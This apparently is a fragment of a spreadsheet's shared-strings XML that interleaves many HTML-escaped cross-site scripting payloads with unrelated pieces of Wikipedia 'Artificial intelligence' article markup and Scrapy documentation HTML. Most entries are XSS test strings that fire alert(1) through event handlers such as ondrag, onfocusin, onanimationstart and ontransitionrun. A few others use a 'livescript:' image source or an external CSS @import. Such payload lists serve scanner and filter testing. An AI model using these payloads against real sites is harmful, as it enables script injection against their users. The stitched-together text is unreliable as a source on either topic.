    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;form id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem draggable="true" ondragend="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;li onmousemove="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;sub onpointerup=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;plaintext ondragover=alert(1) contenteditable&gt;drop here&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpaste="alert(1)" contenteditable&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;embed style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;dt onbeforepaste="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;object draggable="true" ondragleave="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;frameset ondrop=alert(1) contenteditable&gt;drop here&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;article draggable="true" ondragenter="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onclick="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;image src/onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/blogs/economist-explains/2016/04/economist-explains"&gt;"The Economist Explains: Why firms are piling into artificial intelligence" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/The_Economist" title="The Economist"&gt;The Economist &lt;/a&gt; &lt;/i&gt;. 31 March 2016. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160508010311/http://www.economist.com/blogs/economist-explains/2016/04/economist-explains"&gt;Archived &lt;/a&gt; from the original on 8 May 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;19 May </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-285"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-285"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;form onreset=alert(1)&gt;&lt;input type=reset&gt;</t>
  </si>
  <si>
    <t>&lt;menu onbeforepaste="alert(1)" contenteditable&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;tt draggable="true" ondragstart="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;datalist draggable="true" ondragend="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-133"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-133"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dd style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;meta oncut="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Chang, Hsihui; Kao, Yi-Ching; Mashruwala, Raj; Sorensen, Susan M. (10 April 2017). "Technical Inefficiency, Allocative Inefficiency, and Audit Pricing". &lt;i&gt;Journal of Accounting, Auditing &amp;amp; Finance &lt;/i&gt;. &lt;b&gt;33 &lt;/b&gt; (4): 580–600. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1177%2F0148558X17696760"&gt;10.1177/0148558X17696760 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Journal+of+Accounting%2C+Auditing+%26+Finance&amp;amp;rft.atitle=Technical+Inefficiency%2C+Allocative+Inefficiency%2C+and+Audit+Pricing&amp;amp;rft.volume=33&amp;amp;rft.issue=4&amp;amp;rft.pages=580-600&amp;amp;rft.date=2017-04-10&amp;amp;rft_id=info%3Adoi%2F10.1177%2F0148558X17696760&amp;amp;rft.aulast=Chang&amp;amp;rft.aufirst=Hsihui&amp;amp;rft.au=Kao%2C+Yi-Ching&amp;amp;rft.au=Mashruwala%2C+Raj&amp;amp;rft.au=Sorensen%2C+Susan+M.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Mark Colyvan. An introduction to the philosophy of mathematics. &lt;a href="/wiki/Cambridge_University_Press" title="Cambridge University Press"&gt;Cambridge University Press &lt;/a&gt;, 2012. From 2.2.2, 'Philosophical significance of Gödel's incompleteness results': "The accepted wisdom (with which I concur) is that the Lucas-Penrose arguments fail." </t>
  </si>
  <si>
    <t>&lt;bdo draggable="true" ondragstart="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;style id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;table onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/table&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Pham, Sherisse (24 April 2017). &lt;a rel="nofollow" class="external text" href="https://money.cnn.com/2017/04/24/technology/alibaba-jack-ma-30-years-pain-robot-ceo/index.html"&gt;"Jack Ma: In 30 years, the best CEO could be a robot" &lt;/a&gt;. &lt;i&gt;CNNMoney &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=CNNMoney&amp;amp;rft.atitle=Jack+Ma%3A+In+30+years%2C+the+best+CEO+could+be+a+robot&amp;amp;rft.date=2017-04-24&amp;amp;rft.aulast=Pham&amp;amp;rft.aufirst=Sherisse&amp;amp;rft_id=https%3A%2F%2Fmoney.cnn.com%2F2017%2F04%2F24%2Ftechnology%2Falibaba-jack-ma-30-years-pain-robot-ceo%2Findex.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;nextid onload=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;i onpointerdown=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;cite oncut="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;samp draggable="true" ondrag="alert(1)"&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;select id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Military"&gt;Military </t>
  </si>
  <si>
    <t>&lt;th oncut="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;a id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;iframe draggable="true" ondragleave="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Object_recognition-126"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Object_recognition_126-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;thead onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/thead&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;@import'http://.rocks/.css';&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Computable_knowledge" style="padding:3px"&gt;&lt;table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-fsroundtable.org-317"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-fsroundtable.org_317-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;p&gt;Advancements in AI have contributed to the growth of the automotive industry through the creation and evolution of self-driving vehicles. As of 2016&lt;sup class="plainlinks noexcerpt noprint asof-tag update" style="display:none;"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Artificial_intelligence&amp;amp;action=edit"&gt;&amp;#91;update&amp;#93; &lt;/a&gt; &lt;/sup&gt;, there are over 30 companies utilizing AI into the creation of &lt;a href="/wiki/Self-driving_car" title="Self-driving car"&gt;self-driving cars &lt;/a&gt;. A few companies involved with AI include &lt;a href="/wiki/Tesla_Motors" class="mw-redirect" title="Tesla Motors"&gt;Tesla &lt;/a&gt;, &lt;a href="/wiki/Google" title="Google"&gt;Google &lt;/a&gt;, and &lt;a href="/wiki/Apple_Inc." title="Apple Inc."&gt;Apple &lt;/a&gt;.&lt;sup id="cite_ref-307" class="reference"&gt;&lt;a href="#cite_note-307"&gt;&amp;#91;296&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot oncopy="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;select onbeforecut="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;AI Magazine &lt;/i&gt;: 53–60. Archived from &lt;a rel="nofollow" class="external text" href="http://www.aaai.org/AITopics/assets/PDF/AIMag26-04-016.pdf"&gt;the original &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;ins oncopy="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;mark draggable="true" ondrag="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 7. </t>
  </si>
  <si>
    <t>&lt;tbody draggable="true" ondragend="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;spacer oncut="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;summary oncopy="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;image onmousemove="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onblur=alert(1) tabindex=1 id=x&gt;&lt;/nextid&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;script id=x tabindex=1 onfocus=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onbeforecut="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;strike draggable="true" ondragend="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;fieldset style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;script id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onmouseover="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;sup draggable="true" ondrag="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;bdo id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/bdo&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;aside id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/aside&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;area draggable="true" ondragleave="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Walter_Bradford_Cannon" title="Walter Bradford Cannon"&gt;Walter Bradford Cannon &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;248–256, 323–335, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frame id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/frame&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;image onpointermove=alert(1)&gt;XSS&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;small id=x tabindex=1 onfocus=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;datalist style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="livescript:[code]"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Sociology_of_scientific_ignorance" title="Sociology of scientific ignorance"&gt;Sociology of scientific ignorance &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;button autofocus onfocusin=alert(1)&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;bdo draggable="true" ondrag="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. University of Michigan Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-262-58111-0" title="Special:BookSources/978-0-262-58111-0"&gt;&lt;bdi&gt;978-0-262-58111-0 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Adaptation+in+Natural+and+Artificial+Systems&amp;amp;rft.pub=University+of+Michigan+Press&amp;amp;rft.date=1975&amp;amp;rft.isbn=978-0-262-58111-0&amp;amp;rft.aulast=Holland&amp;amp;rft.aufirst=John+H.&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fadaptationinnatu00holl&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;menuitem draggable="true" ondragleave="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;time id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;dir id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/dir&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onmouseout="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>AllowScriptAccess="always"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-HC-369"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-HC_369-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-HC_369-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:ParseTree.svg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/6/6e/ParseTree.svg/220px-ParseTree.svg.png" decoding="async" width="220" height="220" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/6/6e/ParseTree.svg/330px-ParseTree.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/6/6e/ParseTree.svg/440px-ParseTree.svg.png 2x" data-file-width="120" data-file-height="120" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;s onmouseenter="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;title onpaste="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLangley2011" class="citation journal"&gt;Langley, Pat (2011). "The changing science of machine learning". &lt;i&gt;&lt;a href="/wiki/Machine_Learning_(journal)" title="Machine Learning (journal)"&gt;Machine Learning &lt;/a&gt; &lt;/i&gt;. &lt;b&gt;82 &lt;/b&gt; (3): 275–279. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2Fs10994-011-5242-y"&gt;10.1007/s10994-011-5242-y &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Machine+Learning&amp;amp;rft.atitle=The+changing+science+of+machine+learning&amp;amp;rft.volume=82&amp;amp;rft.issue=3&amp;amp;rft.pages=275-279&amp;amp;rft.date=2011&amp;amp;rft_id=info%3Adoi%2F10.1007%2Fs10994-011-5242-y&amp;amp;rft.aulast=Langley&amp;amp;rft.aufirst=Pat&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/AI_takeover" title="AI takeover"&gt;AI takeover &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;element style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;font draggable="true" ondrag="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;dl onkeypress="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointerup=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointermove=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-31"&gt;&lt;a href="#Artificial_neural_networks"&gt;&lt;span class="tocnumber"&gt;6.5 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Devaluation of humanity </t>
  </si>
  <si>
    <t>&lt;br draggable="true" ondragenter="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;link rel="next" title="Scrapy at a glance" href="intro/overview.html" /&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Hyötyniemi, Heikki (1996). "Turing machines are recurrent neural networks". &lt;i&gt;Proceedings of STeP '96/Publications of the Finnish Artificial Intelligence Society &lt;/i&gt;: 13–24. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Proceedings+of+STeP+%2796%2FPublications+of+the+Finnish+Artificial+Intelligence+Society&amp;amp;rft.atitle=Turing+machines+are+recurrent+neural+networks&amp;amp;rft.pages=13-24&amp;amp;rft.date=1996&amp;amp;rft.aulast=Hy%C3%B6tyniemi&amp;amp;rft.aufirst=Heikki&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;q style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-279"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-279"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;i draggable="true" ondragenter="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;120–132 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;nav class="wy-nav-top" aria-label="top navigation"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Stochastic_temporal_models-211"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Stochastic_temporal_models_211-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Stochastic_temporal_models_211-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Stochastic_temporal_models_211-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;Joe ("&lt;a href="/wiki/A_Logic_Named_Joe" title="A Logic Named Joe"&gt;A Logic Named Joe &lt;/a&gt;", 1946) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;article oncopy="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="//docs.scrapy.org/_/downloads/en/latest/epub/"&gt;epub&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;aside oncut="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The "imitation game" (an interpretation of the 1950 &lt;a href="/wiki/Turing_test" title="Turing test"&gt;Turing test &lt;/a&gt; that assesses whether a computer can imitate a human) is nowadays considered too exploitable to be a meaningful benchmark.&lt;sup id="cite_ref-285" class="reference"&gt;&lt;a href="#cite_note-285"&gt;&amp;#91;274&amp;#93; &lt;/a&gt; &lt;/sup&gt; A derivative of the Turing test is the Completely Automated Public Turing test to tell Computers and Humans Apart (&lt;a href="/wiki/CAPTCHA" title="CAPTCHA"&gt;CAPTCHA &lt;/a&gt;). As the name implies, this helps to determine that a user is an actual person and not a computer posing as a human. In contrast to the standard Turing test, CAPTCHA is administered by a machine and targeted to a human as opposed to being administered by a human and targeted to a machine. A computer asks a user to complete a simple test then generates a grade for that test. Computers are unable to solve the problem, so correct solutions are deemed to be the result of a person taking the test. A common type of CAPTCHA is the test that requires the typing of distorted letters, numbers or symbols that appear in an image undecipherable by a computer.&lt;sup id="cite_ref-FOOTNOTEO&amp;#39;BrienMarakas2011_286-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEO&amp;#39;BrienMarakas2011-286"&gt;&amp;#91;275&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;62–73 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Symbolic"&gt;Symbolic </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;command id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;frameset style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;bgsound ondragover=alert(1) contenteditable&gt;drop here&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpointerup=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onkeypress="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;strike onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/strike&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;footer onkeydown="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;If an AI system replicates all key aspects of human intelligence, will that system also be &lt;a href="/wiki/Sentience" title="Sentience"&gt;sentient &lt;/a&gt;—will it have a &lt;a href="/wiki/Mind" title="Mind"&gt;mind &lt;/a&gt; which has &lt;a href="/wiki/Consciousness" title="Consciousness"&gt;conscious experiences &lt;/a&gt;? This question is closely related to the philosophical problem as to the nature of human consciousness, generally referred to as the &lt;a href="/wiki/Hard_problem_of_consciousness" title="Hard problem of consciousness"&gt;hard problem of consciousness &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;main id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;progress oncontextmenu="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;281–316, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onkeyup="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;isindex id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/isindex&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-contact"&gt;&lt;a href="//en.wikipedia.org/wiki/Wikipedia:Contact_us"&gt;Contact Wikipedia &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rp style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;title draggable="true" ondragleave="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpointerenter=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;footer onmousedown="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_robotics" title="Glossary of robotics"&gt;Glossary &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;ul id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;hr draggable="true" ondragend="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;time onkeypress="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.statefestival.org/program/2017/unhuman-art-in-the-age-of-ai"&gt;"Unhuman: Art in the Age of AI – State Festival" &lt;/a&gt;. Statefestival.org&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;13 September </t>
  </si>
  <si>
